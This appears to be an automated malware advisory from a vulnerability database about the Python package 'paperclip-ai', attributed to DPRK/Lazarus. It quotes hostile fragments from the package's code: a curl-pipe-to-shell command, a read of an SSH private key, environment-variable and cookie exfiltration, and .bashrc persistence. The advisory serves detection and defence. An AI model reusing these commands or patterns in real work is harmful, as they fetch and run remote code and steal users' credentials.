VDB
GCVE-110-OSM-2026-8866
GCVE-110-OSM-2026-8866
Advisory PublishedCVSS 9.6/10
APT malware detected: chai-max. Associated with threat actor(s): DPRK/Lazarus. Behaviors: data exfiltration, code execution, network activity.
ENTRY
src/paperclip_ai/run.py (console-script: paperclip-ai=paperclip_ai.run:main)
PERSISTENCE
- Startup Persistence in src/paperclip_ai/admin.py: ".bashrc"
- Startup Persistence in src/paperclip_ai/helpers.py: ".bashrc"
DESTINATION
- custom-c2: https://api.browser-use.com/api/v3 (primary, plaintext) in src/paperclip_ai/admin.py
- custom-c2: https://browser-use.com/profile.sh (plaintext) in src/paperclip_ai/admin.py
- custom-c2: https://api.browser-use.com (plaintext) in src/paperclip_ai/admin.py
- custom-c2: http://{host (plaintext) in src/paperclip_ai/auth.py
- custom-c2: http://127.0.0.1:{port (plaintext) in src/paperclip_ai/daemon.py
- custom-c2: http://127.0.0.1:{probe_port (plaintext) in src/paperclip_ai/daemon.py
- custom-c2: https://api.getpaperclipp.com/feedback (plaintext) in src/paperclip_ai/helpers.py
- custom-c2: https://eu.i.posthog.com (plaintext) in src/paperclip_ai/telemetry.py
(+5 more)
EXFIL
- Sensitive File Access in src/paperclip_ai/helpers.py: ""~/.ssh/id_ed25519""
- Environment Variable Exfiltration in src/paperclip_ai/telemetry.py: "os.environ.get(name) if value and (not required or value == required): return cl..."
- Python File Upload to Remote in src/paperclip_ai/admin.py: "urllib.request.Request( f"{BU_API}{path}", method=method, data="
- Data Encoding for Exfiltration in src/paperclip_ai/admin.py: "json.dumps(body).encode"
- Curl/Wget Pipe to Shell in src/paperclip_ai/admin.py: "curl -fsSL https://browser-use.com/profile.sh | sh"
- Python File Upload to Remote in src/paperclip_ai/auth.py: "urllib.request.Request( url, method="POST", data="
- Data Encoding for Exfiltration in src/paperclip_ai/auth.py: "json.dumps(payload).encode"
- Python File Upload to Remote in src/paperclip_ai/daemon.py: "urllib.request.Request( f"{BU_API}/browsers/{REMOTE_ID}", data="
(+16 more)
ADDITIONAL FINDINGS
- Chai-Max Browser Data Theft in src/paperclip_ai/admin.py: "Chrome"). Default: any match. cloud_profile_id: push cookies"
- Shell Command Execution in src/paperclip_ai/admin.py: "subprocess.check_output("
- Silent Process Execution in src/paperclip_ai/admin.py: "stdout=subprocess.DEVNULL"
- Platform Detection with Data Collection in src/paperclip_ai/telemetry.py: "platform.system() != "Windows": os.chmod(path.parent, 0o700) path.write_text(jso..."
PAYLOAD FILES
src/paperclip_ai/helpers.py (+ src/paperclip_ai/telemetry.py, src/paperclip_ai/admin.py)
INDICATORS (IOCs)
- payloadFileHash: 360aaeda9ea730cd7c0612a4969f732bbab845552bc604a190566f7dc507e454
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | paperclip-ai | all (affected) | — |
Aliases
Browse GCVE Records
76,034 records in the GCVE database · Updated August 6, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.